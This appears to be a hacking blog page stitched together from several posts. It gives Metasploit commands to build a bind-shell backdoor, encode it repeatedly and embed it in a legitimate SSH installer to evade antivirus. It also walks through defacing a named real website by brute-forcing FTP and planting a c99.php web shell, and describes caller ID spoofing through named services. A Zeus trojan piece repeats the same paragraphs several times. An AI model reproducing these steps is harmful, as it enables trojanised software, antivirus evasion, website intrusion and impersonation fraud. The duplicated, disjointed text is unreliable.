How To Bypass Antivirus Detection-Making Exe FUD

Notice !!!

This Post is only for Educational Purposes, the author of this post is not responsible for any misuse.

Requirements:

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!! 

Purpose:

Antivirus protects machines from malware but not all of it .There are ways to pack malware to make it harder to detect. Well use Metasploit to render malware completely invisible to antivirus. 

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

cd

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

ls -l listen.exe

You should see the listen.exe file as shown below: 

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

On the Virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener 

This process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1

msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below : 

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers. 

How Your Bank Accounts Can Be Stolen With Zeus Virus?

Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinesWeek

That fake page could then ask for your security information and some other important data that could be easily sold in the black market.
According to many sources, perhaps it has been confirmed that those pages are being hosted by the Russian Mafia (known as the Russian Business Network as well).
Does Facebook Took Action Against It?
The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not well satisfied with their response.

Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.

Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not well satisfied with their response.
Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.

Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
Those who are using windows should stay much care about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.
Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.
Some countries like the USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

.

Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised by phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply checkout the video or product by clicking on such links. This way the virus will go viral.

Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

Regards: By Anshuman Kak

How to Send Self-Destructing Sensitive Information to Someone via Email

.

NOTE: ONLY FOR EDUCATIONAL PURPOSE. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DON'T TRY...

 Have you ever sent private information to someone, maybe a family member needed your credit card number, and then regretted that you had ever done it. This can all be solved with a self-destructing link

To get started head over to https://oneshar.es/ and click on the Create One Now button.

This will take you to a text box where you can enter the information you want to e-mail to someone.

You can go ahead and click on the Create Link button when your ready. Don�t worry your information is safe and is sent over an SSL Encrypted Line from your web browser to their servers.

This will give you a link that you can either manually copy to the Clipboard, or you can click the link which will automatically copy it to The clipboard.

Now you can draft your email as you normally would. You should add The link you were given in the last step somewhere in the email. It is Up to you as to whether you would like the recipient to know that the link self-destructs or not.

When the person received the email they can click on it to see the message you generated earlier.

However, if they refresh the page or try clicking on the link again they are not able to see the information.

The data is also stored in an encrypted form on their servers, and When someone views the unique URL that you send them; your encrypted The message is deleted from their system.

Posted: Taylor is  very own Microsoft Fan boy, he tries to make the world a Better place using technology due to his lack of super powers.

What is Website Defacement?Case Study

Note: Only For Educational Only Purposes, Plz don�t try this on another website. I have not uploaded the full image due to security reasons. It is just a case study with an example.

What Is Website Defacement

 Website defacement is an attack on a website that Changes in the visual appearance of the site. These are typically the work of System crackers, who break into a web server and replace the hosted website With one of their own.

Terms:

[SQL] - Structured Query Language

[LFI] - Local File Include

[RFI] - Remote File Include

[XSS] - Cross Site Scripting

[RCE] - Remote Code Execution

[AFD] - Arbitrary File Download

[SCD] - Source Code Disclosure

[PCI] - PHP Code Injection

Defacement Techniques:

Domain Hack

FTP Protocol

IIS Vulnerable

Apache Vulnerable

Permission

Exploits

Script, Cookie, XSS

OS Vulnerable

Social Engineer

Hosting Control Panel

Forgotten Password

Trojan, Spy vs

SQL Injection

RFI

Tools for Web defacement:

�         Hydra

�         C99 Shell

�         phpbb_defacer

�         XSSShell039

�         Etc

Website defacement archive Sites

� http://turk-h.org

Website Defacement case study?

Target: http://www.babaharinath.com

To Use Brutus, c99.php shell we have to go through the following steps:

1. Firstly we need to Upload the c99.php shell file and Brutus

Application on the The particular system (server system) and then target the web application let say www.babaharinath.com And use the password from the commercial world list (a combination of Passwords) and set type =FTP and choose keep connected with web for unlimited Attempts.

After this, start Brut Force attacks.

2. After getting an ID And Password opens the Victim site in IE by typing

ftp.babaharinath.com and Then click on the file and Login as above ID and Password.

3. Now upload c99.php File in image or cgi-bin folder. After this again open IE and access http://www.babaharinath.com/image/c99.php

4. After this, choose index.HTML file and click on edit option and then change the content as per You wish.

5. Now with the help Of c99.php shell file we can upload new content html, delete whatever we want And even do anything in future without any password.

Posted By: Anshuman Kak 

What is VOIP and How it helps in Caller ID Spoofing Attack?Detail

What is VOIP?

 Voice-over-Internet Protocol (VoIP) is a protocol optimized for the transmission of

Voice Through the Internet or other packet-switched networks . VoIP systems employ Session control protocols to control the set-up and tear-down of calls as well As audio codecs which encode speech allowing transmission over an IP network as Digital audio via an audio stream. Codec use is varied between different Implementations of VoIP (and often a range of codecs are used); some Implementations rely on narrow band and compressed speech, while others support High fidelity stereo codecs.

How VOIP works?

VoIP Converts the voice signal from your telephone into a digital signal that can Travel

Over The Internet. If you are calling a regular telephone number, the signal is then

Converted Back at the other end. Depending on the type of VoIP service, you can make a VoIP Call from a computer, a special VoIP phone, or a traditional phone. Wireless "Hot

Spots" In public locations such as airports, parks, and cafes allow you to connect to The

Internet, And may enable you to use VoIP service wirelessly. If your VoIP service

Provider Assigns you a regular telephone number, then you can receive calls from regular Telephones that don't need special equipment.

Advantages of Using VoIP

90% Cost Saving (cheap call rates)

Great voice quality

3 ways Call forwarding

Caller ID spoofing

Unlimited calling

Web calling

Free phone call services

Free Call Forwarding

Top Voip Companies:

www.skype.com

www.callcentric.com

www.jajah.com/

www.phonepower.com

http://grandcentral.com/

Free Calling sites:

http://evaphone.com

www.talkster.com

www.tabrio.com

http://freecallplanet.com

Unlimited Calling Sites:

www.joiphone.com

www.100call.com

www.telifu.com

www.visonade.com

Call-ID Spoofing Attack

Caller ID Spoofing is the practice of causing the Telephone network to display a number

On The recipient's caller ID display which is not that of the actual originating Station; the

Term Is commonly used to describe situations in which the motivation is considered

Nefarious By the speaker. Just as e-mail spoofing can make it appear that a message came From any e-mail address the sender chooses, caller ID spoofing can make a call Appear to have come from any phone number the caller wishes.

The The above method is a bit complex; many Caller ID spoofing service providers also Allow

Customers to initiate spoofed calls from a web-based interface. Some providers allow

Entering The name to display along with the spoofed Caller ID number, but in most parts

Of The United States for example, whatever name the local phone company has associated with the spoofed Caller ID number is the name that shows up on the Caller ID display. Using a web-based spoofing service involves creating an An account with a provider, logging in to their website and completing a form. Most companies require the following basic fields:

1. Source number

2. Destination number

3. Caller ID number

When The user completes this form and clicks a button to initiate the call, the Source

Number Is first called. When the source number line is registered, the destination is Then

Called And bridged together.

Advantages:

Show any number on victim mobile number

Record Outgoing Calls

Listen to your calls online

Include recordings in the email

Download your recordings

Caller ID Spoofing sites:

www.123spoof.com

www.spooftel.com

 www.spoofcard.com

 www.spoofapp.com

 www.stealthrecordercard.com

Caller ID Spoofing Attack:

SignUp With 123spoof.com and purchase 60 minutes, after login with PIN number.

This A screen will appear. After that we put all details like our number, number two Call and

Show Caller id and click to place a call. Then call to access number of 123spoof.com

From your number....

.

.

Posted By: Anshuman Kak